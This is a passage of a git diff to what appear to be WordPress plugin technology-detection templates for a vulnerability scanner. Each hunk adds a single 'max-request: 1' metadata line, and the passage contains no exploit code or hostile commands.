b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ 